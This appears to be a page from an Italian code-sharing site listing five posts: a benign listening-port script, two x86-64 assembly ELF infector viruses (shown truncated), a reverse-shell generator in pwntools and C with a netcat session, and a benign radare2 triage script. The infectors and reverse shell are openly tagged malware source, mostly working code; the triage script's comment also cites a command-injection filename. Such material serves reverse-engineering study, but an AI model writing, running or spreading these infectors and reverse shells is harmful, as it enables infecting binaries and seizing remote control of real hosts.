
  1. CheckListenPorts - HCF

    By HCF il 29 April 2024
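    #!/bin/bash
    # CheckListenPorts: print every listening TCP/UDP socket on this host together
    # with the process that owns it, grouped per port, so unexpected listeners
    # stand out during a host review.
    #
    # Notes on the approach:
    #  - the port is taken as the last ':'-separated field of the local address,
    #    so IPv6 listeners ("[::]:22", ":::22") are kept; taking the second
    #    ':' field only works for IPv4 "a.b.c.d:port" and yields an empty string
    #    for IPv6 rows;
    #  - each port is matched as an exact local-address suffix, never with a bare
    #    `grep $port`, which also matches PIDs, longer ports (22 vs 2222) and IPs;
    #  - nothing is written to the current directory;
    #  - `ss` is used for both steps (netstat is deprecated in net-tools).
    set -euo pipefail

    # -p (owning process) needs root for sockets owned by other users.
    if [ "$(id -u)" -eq 0 ]; then
        SS=(ss)
    else
        SS=(sudo ss)
    fi

    # ss -H: no header, -l: listening, -t/-u: TCP and UDP, -n: numeric.
    # Column 5 is "Local Address:Port"; keep the distinct port numbers.
    mapfile -t ports < <("${SS[@]}" -Hltun | awk '{n = split($5, a, ":"); print a[n]}' | sort -nu)

    if [ "${#ports[@]}" -eq 0 ]; then
        echo "no listening sockets found" >&2
        exit 0
    fi

    # Print only rows whose local address ends in ":<port>" (exact match).
    for port in "${ports[@]}"; do
        "${SS[@]}" -Hltunp | awk -v p="$port" '{n = split($5, a, ":"); if (a[n] == p) print}'
    done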
  2. BPA ELF infector Reverse Shell - bash

    Tags
    malware
    By AKIRA BASHO il 17 April 2023

    ;BPAinfectorRS.asm

    ;fasm BPAinfectorRS.asm

    ;Stack buffer:
    ;r15 + 0 = stack buffer (10000 bytes) = stat
    ;r15 + 48 = stat.st_size
    ;r15 + 144 = ehdr
    ;r15 + 148 = ehdr.class
    ;r15 + 152 = ehdr.pad
    ;r15 + 168 = ehdr.entry
    ;r15 + 176 = ehdr.phoff
    ;r15 + 198 = ehdr.phentsize
    ;r15 + 200 = ehdr.phnum
    ;r15 + 208 = phdr = phdr.type
    ;r15 + 212 = phdr.flags
    ;r15 + 216 = phdr.offset
    ;r15 + 224 = phdr.vaddr
    ;r15 + 232 = phdr.paddr
    ;r15 + 240 = phdr.filesz
    ;r15 + 248 = phdr.memsz
    ;r15 + 256 = phdr.align
    ;r15 + 300 = jmp rel
    ;r15 + 3000 = first run control flag
    ;r15 + 3001 = payload

    format ELF64 executable 3

    SYS_EXIT = 60
    SYS_OPEN = 2
    SYS_CLOSE = 3
    SYS_WRITE = 1
    SYS_READ = 0
    SYS_EXECVE = 59
    SYS_GETDENTS64 = 217
    SYS_FSTAT = 5
    SYS_LSEEK = 8
    SYS_PREAD64 = 17
    SYS_PWRITE64 = 18
    SYS_SYNC = 162
    STDOUT = 1
    EHDR_SIZE = 64
    ELFCLASS64 = 2
    O_RDONLY = 0
    O_RDWR = 2
    SEEK_END = 2
    MFD_CLOEXEC = 1
    DT_REG = 8
    PT_LOAD = 1
    PT_NOTE = 4
    PF_X = 1
    PF_R = 4
    FIRST_RUN = 1
    V_SIZE = 1054

    segment readable executable
    entry v_start

    v_start:
    mov r14, [rsp + 8]
    mov r10, [rsp + 16]
    push rdx
    push rsp
    sub rsp, 5000
    mov r15, rsp

    check_first_run:
    mov rdi, r14
    mov rsi, O_RDONLY
    xor rdx, rdx
    mov rax, SYS_OPEN
    syscall

    mov rdi, rax
    mov rsi, r15
    mov rax, SYS_FSTAT
    syscall

    cmp qword [r15 + 48], V_SIZE
    jg .open_target_file

    mov byte [r15 + 3000], FIRST_RUN

    .open_target_file:
    mov rdi, r10
    mov rsi, O_RDWR
    xor rdx, rdx
    mov rax, SYS_OPEN
    syscall

    cmp rax, 0
    jbe .continue
    mov r9, rax

    .read_ehdr:
    mov rdi, r9
    lea rsi, [r15 + 144]
    mov rdx, EHDR_SIZE
    mov r10, 0
    mov rax, SYS_PREAD64
    syscall

    .is_elf:
    cmp dword [r15 + 144], 0x464c457f
    jnz .close_file

    .is_64:
    cmp byte [r15 + 148], ELFCLASS64
    jne .close_file

    .is_infected:
    cmp dword [r15 + 152], 0x00415042
    jz .close_file

    mov r8, [r15 + 176]
    xor rbx, rbx
    xor r14, r14

    .loop_phdr:
    mov rdi, r9
    lea rsi, [r15 + 208]
    mov dx, word [r15 + 198]
    mov r10, r8
    mov rax, SYS_PREAD64
    syscall

    cmp byte [r15 + 208], PT_NOTE
    jz .infect

    inc rbx
    cmp bx, word [r15 + 200]
    jge .close_file

    add r8w, word [r15 + 198]
    jnz .loop_phdr

    .infect:
    .get_target_phdr_file_offset:
    mov ax, bx
    mov dx, word [r15 + 198]
    imul dx
    mov r14w, ax
    add r14, [r15 + 176]

    .file_info:
    mov rdi, r9
    mov rsi, r15
    mov rax, SYS_FSTAT
    syscall

    .append_virus:
    mov rdi, r9
    mov rsi, 0
    mov rdx, SEEK_END
    mov rax, SYS_LSEEK
    syscall
    push rax

    call .delta
    .delta:
    pop rbp
    sub rbp, .delt...


  3. BPA ELF Infector - bash

    Tags
    malware
    By AKIRA BASHO il 16 April 2023

    ;BPAinfector.asm

    ;fasm BPAinfector.asm

    ;Stack buffer:
    ;r15 + 0 = stack buffer (10000 bytes) = stat
    ;r15 + 48 = stat.st_size
    ;r15 + 144 = ehdr
    ;r15 + 148 = ehdr.class
    ;r15 + 152 = ehdr.pad
    ;r15 + 168 = ehdr.entry
    ;r15 + 176 = ehdr.phoff
    ;r15 + 198 = ehdr.phentsize
    ;r15 + 200 = ehdr.phnum
    ;r15 + 208 = phdr = phdr.type
    ;r15 + 212 = phdr.flags
    ;r15 + 216 = phdr.offset
    ;r15 + 224 = phdr.vaddr
    ;r15 + 232 = phdr.paddr
    ;r15 + 240 = phdr.filesz
    ;r15 + 248 = phdr.memsz
    ;r15 + 256 = phdr.align
    ;r15 + 300 = jmp rel
    ;r15 + 3000 = first run control flag
    ;r15 + 3001 = payload

    format ELF64 executable 3

    SYS_EXIT = 60
    SYS_OPEN = 2
    SYS_CLOSE = 3
    SYS_WRITE = 1
    SYS_READ = 0
    SYS_EXECVE = 59
    SYS_GETDENTS64 = 217
    SYS_FSTAT = 5
    SYS_LSEEK = 8
    SYS_PREAD64 = 17
    SYS_PWRITE64 = 18
    SYS_SYNC = 162
    STDOUT = 1
    EHDR_SIZE = 64
    ELFCLASS64 = 2
    O_RDONLY = 0
    O_RDWR = 2
    SEEK_END = 2
    MFD_CLOEXEC = 1
    DT_REG = 8
    PT_LOAD = 1
    PT_NOTE = 4
    PF_X = 1
    PF_R = 4
    FIRST_RUN = 1
    V_SIZE = 944

    segment readable executable
    entry v_start

    v_start:
    mov r14, [rsp + 8]
    mov r10, [rsp + 16]
    push rdx
    push rsp
    sub rsp, 5000
    mov r15, rsp

    check_first_run:
    mov rdi, r14
    mov rsi, O_RDONLY
    xor rdx, rdx
    mov rax, SYS_OPEN
    syscall

    mov rdi, rax
    mov rsi, r15
    mov rax, SYS_FSTAT
    syscall

    cmp qword [r15 + 48], V_SIZE
    jg .open_target_file

    mov byte [r15 + 3000], FIRST_RUN

    .open_target_file:
    mov rdi, r10
    mov rsi, O_RDWR
    xor rdx, rdx
    mov rax, SYS_OPEN
    syscall

    cmp rax, 0
    jbe .continue
    mov r9, rax

    .read_ehdr:
    mov rdi, r9
    lea rsi, [r15 + 144]
    mov rdx, EHDR_SIZE
    mov r10, 0
    mov rax, SYS_PREAD64
    syscall

    .is_elf:
    cmp dword [r15 + 144], 0x464c457f
    jnz .close_file

    .is_64:
    cmp byte [r15 + 148], ELFCLASS64
    jne .close_file

    .is_infected:
    cmp dword [r15 + 152], 0x00415042
    jz .close_file

    mov r8, [r15 + 176]
    xor rbx, rbx
    xor r14, r14

    .loop_phdr:
    mov rdi, r9
    lea rsi, [r15 + 208]
    mov dx, word [r15 + 198]
    mov r10, r8
    mov rax, SYS_PREAD64
    syscall

    cmp byte [r15 + 208], PT_NOTE
    jz .infect

    inc rbx
    cmp bx, word [r15 + 200]
    jge .close_file

    add r8w, word [r15 + 198]
    jnz .loop_phdr

    .infect:
    .get_target_phdr_file_offset:
    mov ax, bx
    mov dx, word [r15 + 198]
    imul dx
    mov r14w, ax
    add r14, [r15 + 176]

    .file_info:
    mov rdi, r9
    mov rsi, r15
    mov rax, SYS_FSTAT
    syscall

    .append_virus:
    mov rdi, r9
    mov rsi, 0
    mov rdx, SEEK_END
    mov rax, SYS_LSEEK
    syscall
    push rax

    call .delta
    .delta:
    pop rbp
    sub rbp, .delta
    ...


  4. REVERSE SHELL - bash

    Tags
    malware
    By AKIRA BASHO il 12 April 2023

    #!/usr/bin/python3
    # Builds a small x86-64 Linux ELF ("connect-back" specimen) with pwntools'
    # shellcraft helpers and saves it as 'lnxmw1'.  The post keeps it as a
    # reverse-engineering sample: the same logic is shown in C further down and
    # the transcript runs it against a local netcat listener on 127.0.0.1.
    #
    # Defender's notes on what is visible here:
    #   - destination IP and port are hard-coded constants, i.e. a direct
    #     network IoC and an egress-filter hit;
    #   - fds 0, 1 and 2 are all dup2'd onto one socket before a shell is
    #     spawned: the socket -> connect -> dup2 x3 -> sh sequence is what
    #     syscall-level detections (auditd, EDR rules) commonly key on;
    #   - the checksec output below shows the result has no NX/PIE/RELRO,
    #     a strong static indicator of generated shellcode rather than a
    #     compiler-built binary.

    import os, random, subprocess, string
    from pwn import *

    ipaddr: str = '127.0.0.1'
    port: int = 31337
    outfile: str = 'connectback'  # not used; the ELF is saved as 'lnxmw1' below

    context(arch='x86_64')
    code = shellcraft.socket(network='ipv4', proto='tcp')
    code += shellcraft.connect(ipaddr, port, network='ipv4')
    # 'rbp' is presumably where shellcraft.connect leaves the socket fd — the
    # three dup2 calls redirect stdin/stdout/stderr to it.
    code += shellcraft.dup2('rbp', 0)
    code += shellcraft.dup2('rbp', 1)
    code += shellcraft.dup2('rbp', 2)
    code += shellcraft.sh()

    elf = ELF.from_assembly(code)
    elf.save('lnxmw1')

    ;piccolo malware elf creato con python e con la libreria pwntools

    ./lnxmw1.py
    [*] '/tmp/pwn-asm-02ut4aj4/step3'
    Arch: amd64-64-little
    RELRO: No RELRO
    Stack: No canary found
    NX: NX disabled
    PIE: No PIE (0xffff000)
    RWX: Has RWX segments

    ./lnxmw1

    nc -l 31337
    whoami
    re
    ls -lrt
    total 20
    -rwxrwxr-x 1 re re 794 Apr 12 09:28 restatic.py
    -rw-rw-r-- 1 re re 70 Apr 12 10:29 gamma.sh
    -rwxrwxr-x 1 re re 447 Apr 12 16:07 lnxmw1.py
    -rwxrwxr-x 1 re re 4784 Apr 12 16:07 lnxmw1

    ;esecuzione del malware con server netcat in ascolto sulla porta 31773; il malware crea una reverse shell nel server in ascolto

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/ip.h>
    #include <arpa/inet.h>
    #include <unistd.h>

    /*
     * C equivalent of the pwntools ELF above: open a TCP socket to a hard-coded
     * address, point fds 0/1/2 at it and exec /bin/sh.  Kept as a specimen for
     * the static-analysis script in the next post.
     *
     * Defender's notes: the destination is a fixed IP:port (network IoC /
     * egress-filter hit), and socket -> connect -> dup2 x3 -> execve("/bin/sh")
     * on a single fd is the sequence most syscall-level detections key on.
     * No return value is checked, so a refused connection still execs a shell
     * whose stdio points at an unconnected socket.
     */
    int main () {
    // attacker IP address
    const char* ip = "127.0.0.1";
    // address struct (sin_zero is left uninitialised; harmless for connect)
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444);
    inet_aton(ip, &addr.sin_addr);
    // socket syscall
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    // connect syscall
    // NB: "sockadr" is a typo for sockaddr; the cast only compiles because it
    // implicitly declares a new incomplete struct tag (most compilers at least
    // warn about the incompatible pointer type).
    connect(sockfd, (struct sockadr *)&addr, sizeof(addr));

    for (int i = 0; i < 3; i++) {
    // dup2(sockfd, 0) - stdin
    // dup2(sockfd, 1) - stdout
    // dup2(sockfd, 2) - stderr
    dup2(sockfd, i);
    }

    // execve syscall (argv and envp are NULL; only reached if execve fails
    // does the return below run)
    execve("/bin/sh", NULL, NULL);
    return 0;
    }

    ;codice equivalente in C

  5. restatic.py - bash

    Tags
    re
    By AKIRA BASHO il 11 April 2023

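    #!/usr/bin/python3
    """restatic.py - first-pass static triage of an executable with radare2.

    Usage: restatic.py <file> [function]

    Prints `file` and `checksec` output, the function list, the disassembly and
    summary of one function (default: main), the strings, and every `call`
    instruction found in the binary.  radare2 and the r2pipe module must be
    installed; a missing `file`/`checksec` binary is reported and skipped.
    """

    import os
    import re
    import shutil
    import subprocess
    import sys

    import r2pipe

    if len(sys.argv) < 2:
        sys.exit("usage: %s <file> [function]" % sys.argv[0])

    program_name = sys.argv[0]
    filename = sys.argv[1]
    # Optional second argument selects the function to disassemble.
    func = sys.argv[2] if len(sys.argv) > 2 else "main"

    if not os.path.isfile(filename):
        sys.exit("Error: %s is not a regular file" % filename)


    def run_tool(*argv):
        """Run an external tool with an argv list (no shell); output goes to stdout.

        The file name comes from the command line and is, by the nature of a
        triage tool, attacker-chosen: a sample named `x; rm -rf ~` handed to a
        shell string would be executed instead of analysed.  Passing it as a
        single argv element means it is only ever seen as a path.
        A tool missing from PATH is reported, not fatal.
        """
        if shutil.which(argv[0]) is None:
            print("[!] %s not found in PATH, skipping" % argv[0])
            return
        subprocess.run(list(argv), check=False)


    def section(title):
        """Print a section banner followed by the blank-ish line the layout uses."""
        print("*** " + title + " ***")
        print(" ")


    r2 = r2pipe.open(filename)
    r2.cmd('aaa')
    run_tool("file", filename)
    print(" ")
    run_tool("checksec", "--file", filename)
    print(" ")
    section("list functions")
    print(r2.cmd("afl"))
    print("*** disassemble " + func + " ***")
    # `s` prints nothing on success; any output here is radare2 reporting an
    # unknown symbol, in which case `pdf` disassembles at the current offset.
    print(r2.cmd("s " + func))
    print(r2.cmd("pdf"))
    section("summary " + func)
    print(r2.cmd("pdfs"))
    section("list strings")
    print(r2.cmd("iz"))
    section("list call instructions everywhere")
    print(r2.cmd("/ad/ call"))
    r2.quit()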

    ;script python per una prima analisi statica dell'eseguibile, che utilizza la libreria python r2pipe per comunicare con radare2 e quindi estrarre tutta una serie di informazioni utili per il reversing

